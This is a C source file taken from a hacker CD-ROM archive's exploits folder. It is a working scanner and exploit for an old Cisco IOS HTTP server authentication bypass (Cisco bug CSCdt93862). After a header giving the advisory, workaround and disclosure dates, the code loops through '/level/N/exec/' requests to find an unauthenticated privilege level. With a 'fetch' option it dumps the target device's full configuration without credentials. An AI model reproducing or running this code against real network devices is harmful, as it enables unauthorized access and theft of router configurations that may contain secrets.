home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / cisco / ios-w3-vul.c < prev    next >
Encoding:
C/C++ Source or Header  |  2002-10-22  |  4.9 KB  |  189 lines
  1. /*
  2.  * Cisco IOS HTTP Server Vulnerability Scanner.
  3.  * Written by bashis <bash[at]wcd[dot]se>
  4.  *
  5.  * This code scanning a Cisco router/switch for vulnerability,
  6.  * and as an option fetching the configuration, without any
  7.  * authentication, of the router/switch if vulnerability is found.
  8.  *
  9.  * Vulnerable:
  10.  * Almost(?) ALL Cisco IOS based products with IOS Version later then 11.3,
  11.  * with HTTP server enabled and using no TACACS+ / Radius authentication.
  12.  * (I have been unable to reproduce this on routers/switches with IOS 11.2)
  13.  *
  14.  * Vendors advisory:
  15.  * http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
  16.  *
  17.  * Cisco Bug ID: CSCdt93862
  18.  *
  19.  * Workaround:
  20.  *  Disable HTTP Server.
  21.  *  -or-
  22.  *  Use TACACS+ / Radius for authentication.
  23.  *
  24.  * Solution:
  25.  * Upgrade your IOS, read the vendors advisory for details.
  26.  *
  27.  * Status:
  28.  *  7 May 2001: Vendor was notified about this bug.
  29.  * 27 Jun 2001: Vendor released advisory.
  30.  * 30 Oct 2001: Decided to make this scanner go public.
  31.  *
  32.  * Compile: gcc -Wall -o ios-w3-vul ios-w3-vul.c
  33.  * (Tested on Linux and OpenBSD)
  34.  *
  35.  */
  36.  
  37. #include <ctype.h>
  38. #include <netdb.h>
  39. #include <string.h>
  40. #include <stdio.h>
  41. #include <unistd.h>
  42. #include <errno.h>
  43. #include <sys/types.h>
  44. #include <sys/socket.h>
  45. #include <netinet/in.h>
  46.  
  47. #define BUF_SIZE 1024
  48.  
  49. char getreq[] =        "GET /level/";
  50. char cmd_pwd[] =    "/exec/-///pwd  HTTP/1.0\n\n";
  51. char cmd_sh_conf[] =    "/exec/-///show/configuration HTTP/1.0\n\n";
  52.  
  53. int fetchc(int argc, char *argv[], struct sockaddr_in sin, struct hostent *inet_host, char vulnl[])
  54. {
  55.     int sock;
  56.     char inbuf[BUF_SIZE], outbuf[BUF_SIZE];
  57.  
  58.     if((sock=socket(AF_INET, SOCK_STREAM, 0)) < 0){
  59.         printf("Can't create  socket: %s\n",strerror(errno));
  60.         return(1);
  61.     }
  62.  
  63.     if (connect(sock, (struct sockaddr*)&sin, sizeof(sin)) < 0){
  64.         printf("Can't connect to %s: %s\n",argv[1], strerror(errno));
  65.         return(1);
  66.     }
  67.  
  68.     bzero(outbuf,sizeof(outbuf));
  69.     bzero(inbuf,sizeof(inbuf));
  70.     strcat(outbuf,getreq);
  71.     strcat(outbuf,vulnl);
  72.     strcat(outbuf,cmd_sh_conf);
  73.     send(sock,outbuf,strlen(outbuf),0);
  74.     while(recv(sock,inbuf,sizeof(inbuf),0)){
  75.         printf("%s",inbuf);
  76.         if(strstr(inbuf,"command completed"))
  77.             break;
  78.         bzero(inbuf,sizeof(inbuf));
  79.     }
  80.     close(sock);
  81.     return(1);
  82. }
  83.  
  84. int main(int argc, char *argv[])
  85. {
  86.     int sock, i;
  87.     int ok = 0, bad = 0, other = 0, unauth = 0, count = 0;
  88.     int finish = 0, fetch = 0;
  89.     char inbuf[BUF_SIZE], outbuf[BUF_SIZE];
  90.     char tmp[5];
  91.     struct sockaddr_in sin;
  92.     struct hostent *inet_host;
  93.  
  94.     printf("\nCisco IOS HTTP Server Vulnerability Scanner.\n");
  95.     printf("by bashis <bash[at]wcd[dot]se> Cisco Bug ID: CSCdt93862\n\n");
  96.  
  97.     if((argc < 2) || (strstr(argv[1],"-?")))
  98.     {
  99.         printf("Usage: %s <host> [fetch]\n",argv[0]);
  100.         printf("\n <host>: ip or hostname to scan.\n[fetch]: fetching configuration when finding a vulnerability and exit.\n\n");
  101.         exit(0);
  102.     }
  103.  
  104.     if(argc > 2)
  105.         if(!(strncmp(argv[2],"fetch",5))){
  106.             fetch++;
  107.         }
  108.  
  109.     if ((inet_host=gethostbyname(argv[1])) == NULL) {
  110.         printf("Can't resolve %s\n",argv[1]);
  111.         exit(1);
  112.     }
  113.  
  114.     sin.sin_family=AF_INET;
  115.     sin.sin_port=htons(80);
  116.     bcopy(inet_host->h_addr, (char *)&sin.sin_addr, inet_host->h_length);
  117.  
  118.     for(i=0;i<=100;i++) {
  119.         if((sock=socket(AF_INET, SOCK_STREAM, 0)) < 0)
  120.         {
  121.             printf("Can't create  socket: %s\n",strerror(errno));
  122.             return(1);
  123.         }
  124.  
  125.         if (connect(sock, (struct sockaddr*)&sin, sizeof(sin)) < 0)
  126.         {
  127.             printf("Can't connect to %s: %s\n",argv[1], strerror(errno));
  128.             return(1);
  129.         }
  130.         bzero(outbuf,sizeof(outbuf));
  131.         strcat(outbuf,getreq);
  132.         bzero(tmp,sizeof(tmp));
  133.         sprintf(tmp,"%d",i);
  134.         strcat(outbuf,tmp);
  135.         strcat(outbuf,cmd_pwd);
  136.         bzero(inbuf,sizeof(inbuf));
  137.         send(sock,outbuf,strlen(outbuf),0);
  138.         while(recv(sock,inbuf,sizeof(inbuf),0))
  139.         {
  140.             if(strstr(inbuf,"200 OK")) {
  141.                 printf("Received: 200 OK\t\t(%d is vulnerable)\n",i);
  142.                 ok++;
  143.  
  144.                 if(fetch) {
  145.                     bzero(tmp,sizeof(tmp));
  146.                     sprintf(tmp,"%d",i);
  147.                     if(fetchc(argc, argv, sin, inet_host,tmp)){
  148.                         finish++;
  149.                         break;
  150.                     }
  151.                 }
  152.                 break;
  153.             }
  154.             else if(strstr(inbuf,"401 Unauthorized")) {
  155.                 unauth++;
  156.                 printf("Received: 401 Unauthorized\t(%d is not vulnerable)\n",i);
  157.             }
  158.             else if(strstr(inbuf,"400 Bad Request")) {
  159.                 bad++;
  160.                 printf("Received: 400 Bad Request\t(%d is not vulnerable)\n",i);
  161.             } else {
  162.                 other++;
  163.                 break;
  164.             }
  165.  
  166.             if(strstr(inbuf,"command completed")){
  167.                 break;
  168.             }
  169.         }
  170.         count++;
  171.         close(sock);
  172.         if(finish || other)
  173.             break;
  174.         usleep(50);
  175.     }
  176.  
  177.     if(ok && !fetch) {
  178.         printf("\n%s IS vulnerable, DISABLE HTTP and upgrade your IOS!.\n",argv[1]);
  179.     }
  180.     else if(!other && !ok)
  181.         printf("\n%s seems NOT to be vulnerable. Using TACACS+/Radius?\n",argv[1]);
  182.     else if((fetch && !other) || (fetch && !ok))
  183.         printf("\nFetched configuration from %s...\n",argv[1]);
  184.     else
  185.         printf("Uh Ah Oh Whats this?? - This Can't be a Cisco device..\nYou should check if it's a Cisco device you are trying to scan.. ;->\n\n");
  186.     printf("Status: Sent:%d, 200 OK:%d, 400 Bad request:%d, 401 Unauthorized:%d, Other:%d\n",count,ok,bad,unauth,other);
  187.     return(0);
  188. }
  189.